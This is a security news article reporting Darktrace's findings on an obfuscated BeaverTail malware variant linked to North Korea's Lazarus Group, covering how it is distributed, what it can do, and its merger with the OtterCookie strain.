New BeaverTail Malware Variant Linked to Lazarus Group
A newly observed variant of the BeaverTail malware has been tied to hackers associated with North Korea. The findings come from Darktrace’s latest The State of Cybersecurity report, which links BeaverTail activity to DPRK threat clusters assessed to be part of the Lazarus Group. Targets have included cryptocurrency traders, developers, and retail employees, aligning with motivations spanning financial gain and espionage.
The JavaScript-based malware functions as both an information stealer and a loader, harvesting system details before attempting to retrieve additional payloads from remote servers. Darktrace noted that its continued evolution highlights how supply chain compromise remains a persistent concern for the finance sector.
Recent findings reveal an increase in the level of obfuscation and delivery diversity in recent samples. A BeaverTail file analyzed from November 2025, identified as an obfuscated JavaScript package, used layered Base64 and XOR encoding to conceal its behavior. Once executed, it collected hostnames, usernames, and platform data and attempted to contact a command-and-control (C2) server to fetch follow-on malware. This role is historically played by BeaverTail in deploying the InvisibleFerret backdoor.
BeaverTail has been distributed through multiple channels designed to exploit trust in common development workflows, which include: Trojanized npm packages that were available long enough to be downloaded thousands of times; fake job interview platforms posing as technical assessments or conferencing tools; and ClickFix lures that prompt users to run operating system commands, which silently download malware.
These techniques are particularly relevant to financial institutions where developers, traders, and analysts often rely on open-source tools and collaboration platforms.
Since 2022, the malware has developed into a modular, cross-platform framework capable of running on Windows, macOS, and Linux systems. It can be delivered as compiled executables, evade detection through dynamic headers and decoy payloads, and enable extensive surveillance. Features observed include keylogging, screenshot capture, and clipboard monitoring aimed at stealing cryptocurrency wallet data and credentials.
In 2025, researchers observed BeaverTail being merged with another DPRK-linked strain known as OtterCookie. This combined toolset adds browser profile enumeration, enhanced wallet targeting, and remote access through legitimate tools like AnyDesk. Jason Soroko, senior fellow at Sectigo, commented, “Darktrace’s identification of a hyper-obfuscated BeaverTail variant marks a significant escalation in tradecraft, transforming a lightweight stealer into a signature-evasive framework shielded by over 128 layers of concealment.” He added, “This technical maturation culminates in the strategic convergence of BeaverTail with the OtterCookie strain, yielding a unified, cross-platform instrument designed for persistent financial theft and surveillance across Windows, macOS, and Linux environments.”